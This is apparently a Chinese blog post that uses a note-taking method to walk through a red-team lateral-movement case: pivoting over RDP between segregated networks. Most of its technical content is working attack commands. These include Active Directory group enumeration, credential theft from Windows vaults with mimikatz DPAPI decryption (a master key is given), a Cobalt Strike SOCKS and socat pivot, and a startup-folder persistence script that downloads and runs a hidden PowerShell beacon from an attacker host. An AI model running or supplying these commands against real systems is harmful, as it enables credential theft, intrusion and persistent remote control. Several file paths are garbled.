zoukankan      html  css  js  c++  java
  • 断剑重铸008

    凝聚知识结晶 编制知识网络

    遇到陌生领域的知识,先别管它什么意思。首要任务是提取出对象,再关注它们的逻辑关系,形成知识网络。

    所有知识它都有一个共性,首先是有什么,然后是跟你讲故事,告诉你它们都怎么了。

    现实举例:什么是角膜?角膜就是人们俗称的"黑眼珠",位于眼球的正前方,形似圆球体的半透明部分。

    就是角膜,黑眼珠,眼球正前方。 这样就简洁 高效 容易理解了。 前提是配合原文一起体会。

    不管我们使用什么方法和心得,目的都是理解他说的啥意思,才能进一步学习。当此法不能帮助你理解性的提升时,请留神,哪里存在问题了。

    让我们来进一步讨论这种学习方式,本文才用资料为,渗透测试中的攻击步骤,横移中的一个案例来BB,请见文末参考资料:利用RDP跳跃网络隔离

    所谓横移就是,钱在主卧室,你从厕所进去的。怎么从厕所到主卧室,就是横移。

    • 阅读介绍

    网络拓扑:jump box secret network 工作站 RDP 互联网 攻击者

    局域网 10.0.0.0/16 rasta-lan.local 秘密网 172.16.0.0/24 secret-lan.local

    攻击者通过互联网到工作站,从工作站用远程桌面到jump box,再用远程到秘密网络

    • 阅读假设违反

    查询哪些用户/组有RDP权限 Jump Box Users

    powerpick Get-NetLocalGroup -ComputerName RDP01 -GroupName "Remote Desktop Users"
    

    查询一下Jump Box Users的成员名字

    powerpick Get-NetGroupMember -GroupName "Jump Box Users"
    

    rasta_mouse Jump Box Users MemberName rasta_mouse_adm

    根据以上知识结晶,就可以配合原文的理解,编制一下自己的知识网络了:攻击者通过互联网进入工作站首先有一个rasta_mouse账户,在该账户下运行命令,查出Jump Box Users组有RDP权限,再查该组还有什么成员,得到rasta_mouse_adm。那么我们就需要从rasta_mouse_adm的账户进行RDP进入下一步。

    • 凭证管理和DPAPI

    查询凭证

    shell vaultcmd /listcreds:"Windows Credentials" /all
    

    凭据存储在users目录中C:UsersAppDataLocalMicrosoftCredentials*
    查询它们

    powerpick Get-ChildItem C:Users
    asta_mouseAppDataLocalMicrosoftCredentials -Force
    

    再查第一条结果

    mimikatz dpapi::cred /in:C:Users
    asta_mouseAppDataLocalMicrosoftCredentials2647629F5AA74CD934ECD2F88D64ECD0
    

    pbData guidMasterKey 加密数据和解密需要的关键数据

    LSASS SeDebugPrivilege 缓存密钥与SeDeDebug权限

    mimikatz !sekurlsa::dpapi
    

    拿到guidMasterKey

    Cobalt Strike运行mimikatz的兼容性表现不佳,手动使用它解密

    mimikatz dpapi::cred /in:C:Users
    asta_mouseAppDataLocalMicrosoftCredentials2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
    
    • RDP01

    设置自己的团队服务器
    在RDP跳转前,先打通命令与控制的通道。设置SOCKS代理。远程自己的服务器,就等于直接远程目标主机,这里就需要设置代理来实现流量的跳转。
    我给你钱让你帮忙把钱给到我朋友那里,你拿到钱把钱给到了我的朋友,就等于我的钱直接到了朋友那里。

    beacon> socks 1337
    

    安装socat & proxychains 修改proxychains.conf 127.0.0.1:1337
    运行socat与proxychains的命令

    proxychains socat TCP4-LISTEN:3389,fork TCP4:10.0.0.100:3389
    

    监听3389流量,重定向到10.0.0.100:3389

    SSH进入自己的团队服务器,任何使用3389的流量都到了10.0.0.100:3389。 攻击者到互联网中自己的服务器,通过socks代理,将3389流量重定向到目标工作站。你连接自己的服务器,就跳转了一下到目标的工作站的远程端口上面。

    使用自己的电脑发起C2指令,我们通过rasta_mouse_adm账户进入到了jump box网络环境里了。

    • 坚持(持久性)

    设置一个持久性元素,当账户的主人登陆时,获得SMB Beacon,关于SMB Beacon可阅读文末参考资料:SMB Beacon
    这是一个非常简单的例子:

    创建无阶段PowerShell SMB Beacon有效负载。
    将它托管在您的Teamserver(网络传送)上/smb。
    Reverse Port Foward在我们当前的灯塔上创建一个- >rportfwd 8080 178.62.56.134 80
    C:Users
    asta_mouse_admAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupstartup.bat使用以下内容创建:powershell.exe -nop -w hidden -c "iex ((new-object net.webclient).downloadstring('http://10.0.1.200:8080/smb'))"
    注销RDP会话。
    

    创建有效载荷,放到自己团队服务器上/smb,设置反向端口转发。

    当真正的用户登录时,我们会在我们的博客中看到一个消息。

    • 进入secret网络

    手法一样,设置RDP跳转。

    参考资料:
    利用RDP跳跃网络隔离:https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/
    SMB Beacon:https://github.com/aleenzz/Cobalt_Strike_wiki/blob/master/第三节[SMB Beacon].md

  • 相关阅读:
    Bzoj 3654 图样图森波 题解
    1.27号考试记录
    博弈论入门小结
    「考试总结」2020-11-18 爆零
    「补题」考试题泛做
    CSP2020 游记,总结与题解
    Luogu2827 「NOIP2016」 蚯蚓
    【学习笔记】四毛子算法
    「考试反思」2020-11-04 临行
    「考试反思」2020-10-31 警示
  • 原文地址:https://www.cnblogs.com/sec875/p/11495200.html
Copyright © 2011-2022 走看看